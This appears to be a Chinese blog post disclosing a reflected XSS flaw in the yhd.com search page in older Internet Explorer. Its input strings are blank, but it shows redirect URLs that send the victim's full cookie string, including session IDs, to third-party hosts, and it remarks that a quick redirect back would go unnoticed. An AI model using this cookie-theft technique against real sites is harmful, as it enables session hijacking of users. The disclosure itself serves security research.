发现一号店首页曝出XSS漏洞,在IE8,IE9,IE10上均有此漏洞

1.进入一号店首页:

http://www.yhd.com

2.搜索第一个字符串或者第二个字符串:

第一个:

第二个:

(这里说明下,第一个字符和第二个字符都是单引号,第三个字符是双引号,接着!--)

搜索页面:

3.在IE8,IE9,IE10上按下搜索键

页面跳转到:

http://wz.cn/?p=test_cookie=1; abtest=68; guid=YY4T47H26NXG2JTP38FW93E9JX4TPRC565UV; wide_screen=1; provinceId=1; gla=1.-10_0_0; bfd_session_id=bfd_s=40580330.8501225.1444660093687; tmc=2.40580330.87011629.1444660093687.1444660093687.1444660713109; tma=40580330.58495271.1444560200046.1444560200046.1444610223234.2; tmd=22.40580330.58495271.1444560200046.; linkPosition=search; JSESSIONID=18373150176C65FE11EB46BA041B0729

或者:

http://wz0.cn/?p=abtest=68; guid=YY4T47H26NXG2JTP38FW93E9JX4TPRC565UV; wide_screen=1; provinceId=1; gla=1.-10_0_0; bfd_session_id=bfd_s=40580330.8501225.1444660093687; tmc=3.40580330.87011629.1444660093687.1444660713109.1444661000125; tma=40580330.58495271.1444560200046.1444560200046.1444610223234.2; tmd=23.40580330.58495271.1444560200046.; linkPosition=search; JSESSIONID=B1DE4F8D449DC5B8C133259F19339223

注:当页面跳转到第三方网站后,存储完用户信息后,可以再跳到一号店的首页,如果这个过程速度快,用户可能没有察觉到,当然360卫士是拦截了第一个,不过第二个好像没有拦截。

发现一号店首页曝出重大XSS漏洞,在IE8,IE9,IE10上均有此漏洞相关推荐

  1. 隐藏十年竟无人发现!Sudo 漏洞被曝出:无需密码就能获取 root 权限

    整理 | 郑丽媛 出品 | CSDN(ID:CSDNnews) Sudo,想必但凡接触过 Linux 或 Unix 操作系统的开发者都知道这个可以"为所欲为"的应用程序,系统管理员 ...

  2. windows系统和linux系统可以使用相同的js代码吗_使用Sboxr自动发现和利用DOM(客户端)XSS漏洞...

    这一系列的博客文章将向你展示如何在单页或富JavaScript的应用程序上识别DOM XSS的问题.作为示例,我们将在DOM XSS playground(https://domgo.at)上解决10 ...

  3. ace unlck工具下载_压缩工具:WinRAR 曝出代码执行漏洞,该升级了

    作为享誉全球的装机必备工具,「压缩软件」这四个字基本可以认为是 WinRAR 的专有名字了.只要有 PC 的地方,几乎都能看到 WinRAR 的身影.不过这款软件最近却被曝出了一个有19年历史的代码执 ...

  4. 卡巴斯基安全浏览器_卡巴斯基杀毒软件被曝出用户上网痕迹泄露漏洞

    近期,国外安全研究人员曝出卡巴斯基杀毒软件的脚本中存在一个独特而唯一的标识符,可导致用户在过去4年中访问过的每个网站都被泄露. 该漏洞被标记为CVE-2019-8286,其中所涉及的独特标识可让被访问 ...

  5. security center拒绝访问_Steam被曝出0day提权漏洞,但厂商拒绝修复

    近期,全球流行的Steam游戏客户端被曝出0day提权漏洞,影响全球一亿多Steam用户.该漏洞可让机器上的低权限用户以SYSTEM权限运行程序.这意味着恶意软件很可能利用这个漏洞对受害者的机器进行深 ...

  6. 隐藏了十年的 Sudo 漏洞曝出:无需密码就能获取 root 权限

    整理 | 郑丽媛 出品 | CSDN(ID:CSDNnews) Sudo,想必但凡接触过 Linux 或 Unix 操作系统的开发者都知道这个可以"为所欲为"的应用程序,系统管理员 ...

  7. 二十余款Linksys路由器曝出安全漏洞,或可被远程控制

    本文讲的是 二十余款Linksys路由器曝出安全漏洞,或可被远程控制, 近日,有研究人员透露,Linksys路由器中存在未修补的安全漏洞,这些漏洞将使数以千计的设备受到攻击. 周三,IOActive高 ...

  8. 卡巴斯基杀毒软件被曝出用户上网痕迹泄露漏洞

    近期,国外安全研究人员曝出卡巴斯基杀毒软件的脚本中存在一个独特而唯一的标识符,可导致用户在过去4年中访问过的每个网站都被泄露. 该漏洞被标记为CVE-2019-8286,其中所涉及的独特标识可让被访问 ...

  9. Intel官方对5月15号曝出的CPU侧信道漏洞“ZombieLoad”的详细技术分析(上)

    背景了解 5月15号有媒体曝出,安全研究人员在在一个月之前在Intel 芯片中发现了一种被称为"ZombieLoad"的新漏洞,此漏洞可让攻击者获取当前处理器正在处理的敏感数据. ...

最新文章

  1. Facebook再曝数据丑闻删除应用数据仍会被泄漏
  2. 青少年python编程课_青少年之Python编程课程安排第一季
  3. 【图灵】12月书讯:新书多娇
  4. 08--swift之类与结构体
  5. 灰度图像--图像增强 双边滤波 Bilateral Filtering
  6. 使用Lex和Yacc开发C语言的编译器
  7. 微信小程序报Cannot read property 'setData' of undefined的错误
  8. javascript中的console.log有什么作用?
  9. 2021-09-25
  10. 【Demo 0085】导出EXE文件资源
  11. VS扩展开发 一 导航
  12. 如何从字典中随机选择一个键
  13. LAMP下http跳转到 https
  14. [20150705]从AWR抽取有问题的sql语句.txt
  15. HTTP请求字符限制和HTTP状态码
  16. 深入理解Linux网络技术内幕学习笔记第二章:一些重要的数据结构
  17. 量化交易 交易流程与框架
  18. SSM框架整合及详解
  19. 怎么用计算机ping组播地址,windows – 使用’目标主机无法访问’从同一台计算机ping“回复”(没有到其他计算机的路由)...
  20. Shopee上货软件,新手小白必备神器

热门文章

  1. 服务器租用的三大误解是什么
  2. C++ typename
  3. JNI调用C++代码
  4. java图片强绘制表情符号_java - 具有表情符号的Graphics2D.drawString()无法正常工作 - 堆栈内存溢出...
  5. expect中文版手册
  6. 服务器装了16g内存只显示4g,加装16G内存,电脑却运行卡顿、崩溃?原来是这项设置有问题!...
  7. 《JavaScript 高级程序设计》
  8. Git下载及基本使用
  9. c语言斐波那契数列_数学之美系列图集——斐波那契数列
  10. 如何看待高通创新的背后启示